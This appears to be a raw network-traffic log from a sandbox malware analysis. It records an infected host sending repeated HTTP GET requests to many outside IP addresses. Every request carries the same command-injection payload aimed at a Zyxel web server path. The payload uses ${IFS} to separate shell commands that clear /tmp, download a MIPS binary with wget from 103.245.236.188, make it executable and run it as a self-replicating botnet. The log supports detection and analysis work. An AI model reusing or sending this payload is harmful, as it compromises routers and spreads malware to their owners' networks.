                                                Jan 12, 2024 18:24:40.999953985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5797192.168.2.1345138134.206.44.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999989033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5798192.168.2.1347196137.98.5.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000040054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5799192.168.2.1358618189.235.210.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000087023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5800192.168.2.133653442.23.244.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000139952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5801192.168.2.1350630139.157.17.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000196934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5802192.168.2.134488654.243.250.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000262022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5803192.168.2.135743242.52.197.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000310898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5804192.168.2.1341460116.70.146.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000365019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5805192.168.2.135514064.156.47.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000432968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5806192.168.2.1355092217.92.96.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000523090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5807192.168.2.133712278.137.118.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000583887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5808192.168.2.1344472206.199.59.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000653982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5809192.168.2.1353880146.238.88.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000696898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5810192.168.2.1332876148.13.174.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000782013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5811192.168.2.133666619.36.200.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000844002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5812192.168.2.1358388149.146.70.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000904083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5813192.168.2.1333730196.90.61.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000935078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5814192.168.2.134569480.61.10.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.000979900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5815192.168.2.1343234146.65.62.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001041889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5816192.168.2.1354584168.26.111.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001100063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5817192.168.2.134857439.219.235.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001142979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5818192.168.2.134403094.136.136.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001199007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5819192.168.2.1337482133.220.155.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001234055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5820192.168.2.134852874.236.171.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001305103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5821192.168.2.1333962120.69.154.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001374960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5822192.168.2.133981682.232.184.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001399994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5823192.168.2.1345780171.117.102.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001475096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5824192.168.2.1342340112.130.5.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001524925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5825192.168.2.1354840169.78.24.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001622915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5826192.168.2.1336148206.243.183.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001699924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5827192.168.2.1347778219.43.165.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001753092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5828192.168.2.133444487.248.234.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001813889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5829192.168.2.1339318120.105.18.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.001867056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5830192.168.2.1356170107.235.5.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.006536007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5831192.168.2.133527059.163.191.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007509947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5832192.168.2.13405024.177.84.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007585049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5833192.168.2.1359898177.28.160.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007647991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5834192.168.2.1343364211.197.241.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007703066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5835192.168.2.1358126196.110.152.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007757902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5836192.168.2.1351898204.224.93.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007800102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5837192.168.2.1353320146.202.191.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007853985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5838192.168.2.1353102162.63.10.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007920027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5839192.168.2.1356690122.239.188.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.007975101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5840192.168.2.1347214160.253.179.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008038998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5841192.168.2.1350814209.76.202.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008095026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5842192.168.2.134061473.36.244.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008158922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5843192.168.2.1358236192.20.181.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008205891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5844192.168.2.1341636209.114.139.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008271933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5845192.168.2.135510245.233.7.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008358002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5846192.168.2.1334826150.212.5.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008392096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5847192.168.2.1334496193.64.158.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008506060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5848192.168.2.135687679.149.60.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008512020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5849192.168.2.1346268175.160.45.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008534908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5850192.168.2.134304089.2.50.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:41.008603096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5851192.168.2.1336400185.133.109.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010368109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5852192.168.2.133907823.206.142.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010629892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5853192.168.2.1359762131.24.104.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010698080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5854192.168.2.1346686205.148.196.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010746956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5855192.168.2.1337210162.78.181.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010860920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5856192.168.2.1337276213.88.151.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.010925055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5857192.168.2.1333150164.32.210.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011004925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5858192.168.2.133791257.230.148.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011065006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5859192.168.2.1354616166.1.83.185443
                                                TimestampBytes transferredDirectionData
